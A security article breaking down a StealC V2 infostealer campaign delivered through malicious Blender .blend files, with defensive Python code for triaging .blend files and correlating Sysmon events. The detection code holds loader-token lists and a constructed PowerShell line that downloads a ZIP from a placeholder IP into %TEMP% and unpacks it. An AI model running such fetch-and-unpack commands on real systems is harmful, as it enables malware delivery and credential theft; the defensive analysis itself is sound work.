How StealC V2 Exploits Blender: A Technical Breakdown of the Attack Chain
Blender, a favorite among 3D artists and animators, has recently become an unexpected entry point for cybercriminals. By embedding malicious Python scripts in .blend files, attackers have weaponized a trusted creative tool to deliver the StealC V2 infostealer. The chain exploits no software vulnerability in Blender: it relies on user trust and on the convenience of the “Auto Run Python Scripts” preference, which makes Blender execute embedded code the moment a file is opened. From there the script silently starts a multi-stage infection, fronting its first callback with Cloudflare Workers and using a built-in tool, PowerShell, for the download and unpacking stages so that each step looks like ordinary activity. The resulting stealer targets browser credentials, cryptocurrency wallets, messaging platforms and VPN clients, making it a potent threat for both individuals and organizations. For a detailed breakdown of how this attack unfolds and why it’s so effective, see the full analysis by BleepingComputer.
How StealC V2 Sneaks Through Blender: The Technical Attack Chain Explained
Exploiting Blender’s Python Auto-Execution Feature
Attackers leverage Blender’s Python scripting capabilities to initiate the StealC V2 infostealer campaign. Blender, as a 3D creation suite, allows Python to be stored inside .blend files (as text datablocks, and as Python expressions in animation drivers), enabling automation and customization for legitimate purposes such as rigging tools and add-on bootstrapping. This becomes a security liability when the “Auto Run Python Scripts” preference is enabled: Blender then executes any embedded script marked for registration as soon as the file is opened, with no prompt. The option is off by default, and with it off Blender shows a warning banner offering to allow execution instead of running the code, so the campaign depends on users who have switched it on for convenience, or who click “Allow Execution” out of habit. In the observed campaign, threat actors upload malicious .blend files to popular 3D model marketplaces, such as CGTrader, and wait for such users to download them (BleepingComputer).
Upon opening a compromised .blend file with auto-run enabled, the embedded Python runs inside the Blender process without further user interaction. This code is the first stage of the attack: a small loader whose only job is to fetch and start the next stage. Abusing Blender’s scripting environment is effective because the feature is legitimate and widely used, the code runs with the same rights as the user running Blender, and a malicious text datablock looks no different from a rigging helper unless someone actually reads it.
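The triage script below is an added example written for this article; it is not Blender’s code nor tooling from Morphisec or BleepingComputer. It parses the .blend container directly, which is how a marketplace moderator or analyst can see embedded Python without ever loading the file in Blender: the long-standing 12-byte file header (pointer size, endianness, version) is followed by a chain of fixed-size block headers, Text datablocks carry the block code “TX”, and their text, like driver expressions, lives in the payloads that follow. Newer header variants are rejected rather than misparsed. Assumptions: the suspicious-token list is a starting heuristic, the sample file is synthetic, and files Blender compressed with zstd must be decompressed first.

```python
"""Offline triage of a .blend file for embedded Python.

Added example for this article, not Blender's code nor the researchers' tooling.
It walks the .blend block chain without loading the file in Blender, reports
Text datablocks ('TX' block code) and any block payload containing tokens a
stager would need. The token list and the synthetic sample are assumptions.
"""
import gzip
import struct

# Tokens that rigging/automation scripts rarely need but a loader does
# (network fetch, process spawn, decoding, run-on-load hooks). Assumption.
SUSPICIOUS_TOKENS = [
    b"urllib", b"requests.get", b"socket.", b"subprocess", b"os.system",
    b"powershell", b"base64.b64decode", b"exec(", b"workers.dev",
    b"bpy.app.handlers.load_post",
]


def _decompress(data: bytes) -> bytes:
    """Blender < 3.0 compressed saves with gzip; 3.0+ uses zstd (not in stdlib)."""
    if data[:2] == b"\x1f\x8b":
        return gzip.decompress(data)
    if data[:4] == b"\x28\xb5\x2f\xfd":
        raise ValueError("zstd-compressed .blend: run `zstd -d` on it first")
    return data


def parse_blend_blocks(data: bytes):
    """Return (version, [(code, count, payload), ...]) for a classic-header .blend.

    Header: b'BLENDER' + pointer size ('-' 64-bit / '_' 32-bit) + endianness
    ('v' little / 'V' big) + 3-char version. Each block: 4-byte code, int32
    size, old pointer (4 or 8 bytes), int32 SDNA index, int32 count, payload.
    """
    data = _decompress(data)
    if data[:7] != b"BLENDER" or data[7:8] not in (b"-", b"_") or data[8:9] not in (b"v", b"V"):
        raise ValueError("not a .blend file with the classic 12-byte header")
    ptr_fmt = "Q" if data[7:8] == b"-" else "I"
    endian = "<" if data[8:9] == b"v" else ">"
    version = data[9:12].decode("ascii")
    hdr = struct.Struct(f"{endian}4si{ptr_fmt}ii")
    blocks, off = [], 12
    while off + hdr.size <= len(data):
        code, size, _old_ptr, _sdna, count = hdr.unpack_from(data, off)
        off += hdr.size
        if code == b"ENDB":
            break
        blocks.append((code, count, data[off:off + size]))
        off += size
    return version, blocks


def triage_blend(data: bytes) -> dict:
    """Flag a file that has Text datablocks AND loader-like tokens anywhere."""
    version, blocks = parse_blend_blocks(data)
    text_blocks = sum(1 for code, _, _ in blocks if code.startswith(b"TX"))
    hits = sorted({tok.decode() for _, _, payload in blocks
                   for tok in SUSPICIOUS_TOKENS if tok in payload})
    return {
        "version": version,
        "blocks": len(blocks),
        "text_datablocks": text_blocks,
        "suspicious_tokens": hits,
        "verdict": "REVIEW" if text_blocks and hits else "ok",
    }


def build_sample_blend(script: bytes) -> bytes:
    """Construct a minimal synthetic 64-bit little-endian .blend (not a real
    Blender save): one Text datablock plus a DATA block holding its text."""
    def block(code: bytes, payload: bytes, count: int = 1) -> bytes:
        return struct.pack("<4siQii", code, len(payload), 0xDEADBEEF, 0, count) + payload
    return (b"BLENDER-v305"
            + block(b"GLOB", b"\x00" * 16)
            + block(b"TX\x00\x00", b"\x00" * 32)   # Text ID struct stand-in
            + block(b"DATA", script + b"\x00")      # TextLine string payload
            + block(b"ENDB", b""))


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else build_sample_blend(
        b"import subprocess, urllib.request\n")  # constructed stager fragment
    print(triage_blend(data))
```

Run it as `python blend_triage.py model.blend`; a `REVIEW` verdict means the file has at least one Text datablock and at least one loader-like token, which is the combination to hand to a human before anyone opens the file with auto-run enabled. The check is deliberately a coarse filter: obfuscated loaders can hide the tokens, so a clean result is not a clearance, only an absence of the obvious.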
Multi-Stage Payload Retrieval via Cloudflare Workers
The embedded Python script is engineered to connect to a remote Cloudflare Workers domain and fetch a secondary loader from it. Routing the first callback through Workers is a deliberate choice: the traffic terminates on Cloudflare infrastructure that many organizations already trust and allow, and the attacker-specific hostname sits on a shared, reputable domain, so reputation-based blocking and simple domain or IP denylists do not fire on the first stage (BleepingComputer).
This loader downloads and runs a PowerShell script, the next stage in the chain. PowerShell is a living-off-the-land choice: it is present on every Windows host, signed by Microsoft and routinely allowed by application control policies, so its presence alone is not anomalous; what is anomalous is a script host being launched by a 3D application. The PowerShell script then retrieves two ZIP archives, identified as “ZalypaGyliveraV1” and “BLENDERX”, from attacker-controlled IP addresses rather than hostnames, a second cue that stands out in proxy and connection telemetry. By chaining stages across reputable cloud infrastructure and bare IPs, the attackers spread the indicators of the infection across several pieces so that no single artifact reveals the whole chain, which complicates both detection and response.
Persistence Mechanisms and Payload Deployment
Once the ZIP archives are downloaded, the PowerShell script unpacks them into the user’s %TEMP% directory. The archives contain the components that establish persistence and deploy the primary and secondary payloads. Persistence is achieved by creating LNK (shortcut) files in the Windows Startup folder, so that the malicious executables are launched each time the user logs on (BleepingComputer).
The two payloads delivered are the StealC V2 infostealer and an auxiliary Python-based stealer. Shipping both a compiled stealer and a Python variant is a redundancy play: if one component is detected or fails to execute, the other can still exfiltrate data. Startup-folder LNK persistence is a common, low-effort tactic because it relies on built-in Windows behaviour and needs no elevated privileges (the per-user Startup folder is writable by the user), no service or scheduled task, and no rootkit technique. It is also cheap to hunt: a shortcut in a Startup folder whose target resolves under %TEMP% or %APPDATA% has almost no legitimate explanation.
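The rule logic below is an added example for this article, not a detection from Morphisec, BleepingComputer or any vendor. It models the chain from the Cloudflare Workers callback to the Startup shortcut as stages and alerts only when two or more stages occur on the same host within a short window, which is what makes the individually legitimate pieces (PowerShell, a Startup .lnk, an outbound HTTPS connection) stand out. Field names follow Sysmon; the events are constructed, and the `.workers.dev` suffix, the PowerShell indicator list and `blender.exe` as the parent of PowerShell are assumptions about how the described stages would appear in telemetry (the article names neither the Workers hostname nor the parent process).

```python
"""Stage-correlation detection for the Blender -> PowerShell -> Startup chain.

Added example for this article; it is not a rule from Morphisec, BleepingComputer
or any vendor. Field names follow Sysmon (Image, ParentImage, CommandLine,
DestinationHostname, TargetFilename); the events, the workers.dev suffix used
for the Cloudflare Workers callback and the PowerShell indicators are
assumptions about how the described stages look in telemetry.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Two or more of these in one PowerShell command line = fetch-and-unpack stager.
PS_INDICATORS = ("downloadfile", "downloadstring", "invoke-webrequest", "iwr ",
                 "expand-archive", "%temp%", "\\temp\\", "-w hidden", "-enc")
STARTUP_MARKER = "\\start menu\\programs\\startup\\"


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: dict) -> set:
    """Return the set of chain stages a single event matches (possibly empty)."""
    stages = set()
    image = _basename(ev.get("Image", ""))
    if ev["EventType"] == "ProcessCreate":
        if _basename(ev.get("ParentImage", "")) == "blender.exe" and image in SCRIPT_HOSTS:
            stages.add("stage1_blender_spawns_script_host")
        cmd = ev.get("CommandLine", "").lower()
        if image in ("powershell.exe", "pwsh.exe") and sum(i in cmd for i in PS_INDICATORS) >= 2:
            stages.add("stage2_powershell_fetch_and_unpack")
    elif ev["EventType"] == "NetworkConnect":
        if image == "blender.exe" and ev.get("DestinationHostname", "").lower().endswith(".workers.dev"):
            stages.add("stage1_blender_callback_to_workers")
    elif ev["EventType"] == "FileCreate":
        target = ev.get("TargetFilename", "").lower()
        if target.endswith(".lnk") and STARTUP_MARKER in target:
            stages.add("stage3_startup_lnk_persistence")
    return stages


def correlate(events, window: timedelta = timedelta(minutes=10)) -> dict:
    """Per host, alert when >=2 distinct stages occur within `window` of the first hit.

    Single-stage hits (an admin's own PowerShell download, an installer adding a
    Startup shortcut) are kept out of the alert to limit noise."""
    hits = defaultdict(list)
    for ev in events:
        for stage in classify(ev):
            hits[ev["Computer"]].append((datetime.fromisoformat(ev["UtcTime"]), stage))
    alerts = {}
    for host, seq in hits.items():
        seq.sort()
        first = seq[0][0]
        stages = sorted({s for t, s in seq if t - first <= window})
        if len(stages) >= 2:
            alerts[host] = stages
    return alerts


BLENDER = "C:\\Program Files\\Blender Foundation\\Blender 4.2\\blender.exe"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [  # constructed telemetry, not from the real campaign
    {"EventType": "NetworkConnect", "Computer": "WS01", "UtcTime": "2025-11-10 09:00:05",
     "Image": BLENDER, "DestinationHostname": "placeholder-loader.workers.dev"},
    {"EventType": "ProcessCreate", "Computer": "WS01", "UtcTime": "2025-11-10 09:00:07",
     "Image": PS, "ParentImage": BLENDER,
     "CommandLine": "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile("
                    "'http://198.51.100.10/x.zip','%TEMP%\\x.zip'); Expand-Archive %TEMP%\\x.zip %TEMP%"},
    {"EventType": "FileCreate", "Computer": "WS01", "UtcTime": "2025-11-10 09:00:20",
     "Image": PS, "TargetFilename": "C:\\Users\\artist\\AppData\\Roaming\\Microsoft\\Windows"
                                     "\\Start Menu\\Programs\\Startup\\BlenderUpdate.lnk"},
    {"EventType": "ProcessCreate", "Computer": "WS02", "UtcTime": "2025-11-10 09:30:00",
     "Image": PS, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))
```

The design choice worth copying is the correlation step rather than any single indicator: a PowerShell download or a new Startup shortcut on its own is common enough in a design studio that alerting on it alone would be ignored, whereas a 3D application making a Workers callback, spawning PowerShell and then writing a Startup .lnk within seconds is the chain the article describes and little else.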
Advanced Data Exfiltration Capabilities
StealC V2, as deployed in this campaign, exhibits a significant expansion in its data theft capabilities compared to earlier variants. According to the analysis, the latest version can extract data from over 23 browsers, with credential decryption handled server-side and support for Chrome version 132 and above (BleepingComputer). The server-side step is a design that keeps browser-specific decryption logic off the infected host, where it would otherwise need updating each time Chrome changes its credential protection, as it did with app-bound encryption in 2024. Broad browser coverage means credentials and session tokens can be harvested from most of the browsers a user is likely to run, so a browser update alone is not a defense.
In addition to browser data, StealC V2 targets more than 100 cryptocurrency wallet browser extensions and over 15 standalone cryptocurrency wallet applications, which points to the financial motivation behind the campaign. The malware also seeks out credentials and session data from communication platforms such as Telegram, Discord, Tox, and Pidgin, from VPN clients such as ProtonVPN and OpenVPN, and from email clients including Thunderbird. Exfiltrating data from such a diverse set of applications maximizes the haul’s resale value and enables both direct financial theft and follow-on access: stolen VPN and messaging sessions are exactly what an intruder needs to move from an artist’s workstation into a studio network or to impersonate the victim to colleagues.
Evasion Techniques and Anti-Detection Strategies
A critical aspect of the StealC V2 campaign is how little of it is caught by existing security controls. Although StealC has been documented since 2023, the variant in this campaign was not flagged by any engine on VirusTotal at the time of analysis (BleepingComputer). A zero-detection VirusTotal result says nothing about behavioural detection on the endpoint, but it does mean signature and static reputation checks at the download stage will let the sample through; the article attributes this to obfuscation, delivery through legitimate cloud infrastructure, and frequent updates to the malware’s codebase.
The malware also incorporates an updated User Account Control (UAC) bypass, allowing it to run with elevated privileges without the usual consent prompt; the source does not describe the specific bypass technique used. With elevation it can perform actions that would otherwise require explicit user consent, such as modifying system settings or accessing protected directories. Splitting the infection across compiled and interpreted components complicates response as well as detection: a product that quarantines only the StealC binary leaves the Python stealer and the Startup shortcuts in place, so triage must follow the whole chain back to the .blend file and the %TEMP% drop rather than stop at the first recognized component.
Moreover, the campaign’s reliance on Blender’s scripting environment and the distribution of malicious files through reputable 3D model marketplaces adds an additional layer of social engineering. Users are less likely to suspect files obtained from trusted platforms, and the technical complexity of inspecting embedded Python scripts within .blend files means that malicious code can easily go unnoticed by both end users and marketplace moderators.
Final Thoughts
The StealC V2 campaign is a reminder that trusted creative tools can become delivery vectors without any software vulnerability being involved. By abusing Blender’s scripting feature and distributing malicious files through reputable 3D marketplaces, the attackers combined technical care (multi-stage loaders, Cloudflare Workers as a front, Startup LNK persistence) with an accurate read of how artists share and open assets. The practical defenses follow directly from the chain: keep “Auto Run Python Scripts” disabled and launch Blender with --disable-autoexec on workstations that handle third-party assets, treat the “Allow Execution” banner as a stop sign for downloaded files, open untrusted models in a sandbox or disposable VM, and alert on blender.exe spawning PowerShell or other script hosts and on new shortcuts appearing in Startup folders. For ongoing updates and technical details, refer to the original BleepingComputer report.
References
- Malicious Blender model files deliver StealC infostealing malware. (2025). BleepingComputer. https://www.bleepingcomputer.com/news/security/malicious-blender-model-files-deliver-stealc-infostealing-malware/